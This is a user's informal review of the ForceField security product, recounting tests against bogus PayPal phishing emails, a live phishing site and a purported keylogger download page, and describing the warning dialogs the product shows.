ForceField put to a couple of tests
To get a feel on how the product handles, I ran the following tests:
- Phishing test
- Spyware/Keylogger test
Within the last couple of months I've received two bogus PayPal e-mails. On one e-mail PayPal is informing me of an issue with my account. This is typical of phishing scams designed to have you divulge your PayPal account information. The e-mail has a link that looks like it will take you to a PayPal page but instead takes you to http://173-29-115-105(dot)client(dot)mchsi(dot)com:84/ which, of course, no longer exists; probably got shutdown as soon as it was discovered. When I clicked this link, I didn't get anything back from ForceField; I'm not sure why, but I'm assuming it is because it needed to see the page from that site, and when it couldn't, it had nothing to report. However, the browser itself reported that the URL for the link had a suspicious format.
The other bogus notification from PayPal says that they needed for me to update my PayPal information. This one is a little more interesting as it has an HTML attachment (restore.html), which if downloaded and opened would show a form. The attachment has no virus, but it has a form which if completed and submitted would run a script at http://122(dot)102(dot)5(dot)38/qweasdzxc/libraries/transformations/done4.php. The form asks for everything under the sun: your name, address, credit card, credit card expiration, credit card security code, social security number, and so on--basically everything known to man to help steal your money and identity. When I downloaded the attachment, Yahoo e-mail didn't detect any virus, and ForceField allowed the file to be downloaded. I opened the file and filled it in with bogus information which I then submitted. ForceField had no reaction to it at all. Again, I'm guessing the site where the script is hosted has probably been shut down. I'm giving ForceField the benefit of a doubt that it is designed not to do anything for a link that leads nowhere.
I really needed to find a real and active phishing site. So I did searches on the web and found one. I attempted to browse it and I got ForceField to respond, as shown in the image below.
As you can see, it is very obvious with all the red color that you've hit a bad site. You have the option to stay at the site, but the default selected option is "Go Back". I clicked "Go Back" and it gave me this:
This gave me a sense that danger has been averted.
To do this test, I searched for a list of known spyware sites. One such site listing these "bad" sites is the Rouge/Suspect Anti-Spyware Sites list. The sites listed purport to provide information and tools to help prevent spyware, but instead infects your computer with spyware. I also found a site that is purported to be a known spyware site--http://www(dot)brothersoft(dot)com/keylogger-download-34907.html. I also got a reaction from ForceField on this. See below.
With an "in your face" red alert dialog box, most user will click the "Go Back" button.